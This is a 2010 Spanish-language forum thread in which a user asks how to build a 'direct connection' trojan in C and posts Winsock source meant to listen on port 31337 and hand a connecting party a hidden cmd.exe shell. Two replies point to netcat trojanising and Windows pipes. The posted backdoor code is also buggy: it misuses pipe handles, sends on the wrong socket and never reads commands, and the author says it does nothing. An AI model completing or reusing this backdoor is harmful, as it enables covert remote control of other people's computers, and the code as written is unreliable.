elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Que funcion puedo usar?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Que funcion puedo usar?  (Leído 2,513 veces)
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Que funcion puedo usar?
« en: 4 Septiembre 2010, 17:00 pm »

Buenas, pues estaba pensando en como abrir una cmd remota a traves de un troyano. Al principio pense en dup2, pero no me funcionaba correctamente. Se hacer un troyano inverso, pero quiero hacer un de conex. directa: Cuando me conecte, que me salte una cmd remota. Pero no se exactamente como hacerlo. Uso sockets en C.
Espero sus respuestas y sugerencias. Saludos y gracias


En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Re: Que funcion puedo usar?
« Respuesta #1 en: 4 Septiembre 2010, 17:53 pm »

Lee el artíulo de: Troyanizando Netcat
creo que explicaba como redireccionar lo que le llega al netcat remoto al cmd.exe remoto.
Te dará buenas ideas para luego hacer el código que pase los comandos que le lleguen al cmd.exe
Tambien puedes buscar en google: shell remota windows c++ o algo similar.

Saludos


En línea

bizco


Desconectado Desconectado

Mensajes: 698


Ver Perfil
Re: Que funcion puedo usar?
« Respuesta #2 en: 4 Septiembre 2010, 19:02 pm »

pipes es lo que necesitas. http://msdn.microsoft.com/en-us/library/aa365152%28VS.85%29.aspx
En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: Que funcion puedo usar?
« Respuesta #3 en: 6 Septiembre 2010, 11:41 am »

Bueno, he probado las dos soluciones, pero desgraciadamente no puedo con ninguna de las dos. Las pipes son interesantes, pero no se como hacerlas funcionar en mi favor. Si alguno sabe como usarlas, con un code, k me lo diga por favor. Sobre lo del NC, lo de troyanizando netcat me parece mas de lammer que de alguien k kiere aprender. Sera un manual util, pero no busco meterme en el ordenador de otra persona, si no hacer un troyano de conexion directa, pues ya he hecho el de conex. inversa, k veo realmente simple.
Sigo pensando en lo de las pipes, pero necesito una manita xD!!!
A la vez busco un troyano en C de conex. directa. Vi uno que usaba pipes tambien, pero no se donde esta.

Seguire buscando. Muxas gracias

El code:
Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <winsock.h>
  4.  
  5. HANDLE Out, In, Err;
  6. HANDLE hThread[3];
  7. DWORD IDThread[3];
  8. STARTUPINFO Stup;
  9. SOCKET newsock;
  10. SOCKET sockfd;
  11.  
  12. DWORD WINAPI Lectura(LPVOID lpvThreadParm)
  13. {
  14.   char buffer;
  15.   unsigned long BytesRead;
  16.   int n;
  17.   while(1)
  18.   {
  19.   ReadFile(Out, &buffer, 1, &BytesRead, NULL);
  20.   n= send(sockfd, &buffer, 1, 0);
  21.   }
  22.   return 0;
  23. }
  24. DWORD WINAPI Escritura(LPVOID lpvThreadParm)
  25. {
  26.   char buffer;
  27.   unsigned long BytesRead;
  28.   int n;
  29.   while(1)
  30.   {
  31.   ReadFile(In, &buffer, 1, &BytesRead, NULL);
  32.   n= send(sockfd, &buffer, 1, 0);
  33.   }
  34.   return 0;
  35. }
  36. DWORD WINAPI LecturaError(LPVOID lpvThreadParm)
  37. {
  38.   char buffer;
  39.   unsigned long BytesRead;
  40.   int n;
  41.   while(1)
  42.   {
  43.   ReadFile(Err, &buffer, 1, &BytesRead, NULL);
  44.   n= send(sockfd, &buffer, 1, 0);
  45.   }
  46.   return 0;
  47. }
  48.  
  49. int ShellCode ()
  50. {
  51. CreatePipe (&Out, &Out, NULL, 0);
  52. CreatePipe (&In, &In, NULL, 0);
  53. CreatePipe (&Err, &Err, NULL, 0);
  54.  
  55. Stup.cb=sizeof (Stup);
  56. Stup.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
  57. Stup.wShowWindow = 0;
  58. Stup.hStdOutput = Out;
  59. Stup.hStdError = Err;
  60. Stup.hStdInput = In;
  61. CreateProcess (NULL, "cmd.exe", NULL, NULL, 0, 0, NULL, NULL, &Stup, NULL);
  62.  
  63. hThread[0] = CreateThread(NULL, 0, Lectura, NULL, 0, &IDThread[0]);
  64. hThread[1] = CreateThread(NULL, 0, LecturaError, NULL, 0, &IDThread[1]);
  65. hThread[2] = CreateThread(NULL, 0, Escritura, NULL, 0, &IDThread[2]);
  66.  
  67. WaitForMultipleObjects( 3, hThread, TRUE, INFINITE);
  68. CloseHandle(hThread[0]);
  69. CloseHandle(hThread[1]);
  70. CloseHandle(hThread[2]);
  71. }
  72.  
  73. int main ()
  74. {
  75.    WSADATA wsaData;
  76.    WSAStartup(MAKEWORD(2, 0), &wsaData);
  77.    struct sockaddr_in host, client;
  78.    int a=sizeof (struct sockaddr);
  79.    sockfd=socket (2, 1, 0);
  80.    host.sin_family=AF_INET;
  81.    host.sin_addr.s_addr=0;
  82.    host.sin_port=htons (31337);
  83.    memset (host.sin_zero, 0, 8);
  84.    bind (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr));
  85.    listen (sockfd, 1);
  86.    while (1)
  87.    {
  88.        newsock=accept (sockfd, (struct sockaddr*)&client, &a);
  89. ShellCode ();
  90.        closesocket (newsock);
  91.    }
  92.    closesocket (sockfd);
  93.    return 0;
  94. }
  95.  
Va bien y sin warnings pero falla cuando te conectas. No hace nada!
« Última modificación: 6 Septiembre 2010, 18:09 pm por Sagrini » En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
es posible usar funcion dll en bat??
Scripting
ovichan 2 2,695 Último mensaje 3 Mayo 2012, 12:15 pm
por ovichan
Problemas para usar la función GetExtendedTcpTable
Programación C/C++
el_doctor 9 3,087 Último mensaje 5 Septiembre 2013, 23:15 pm
por Eternal Idol
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines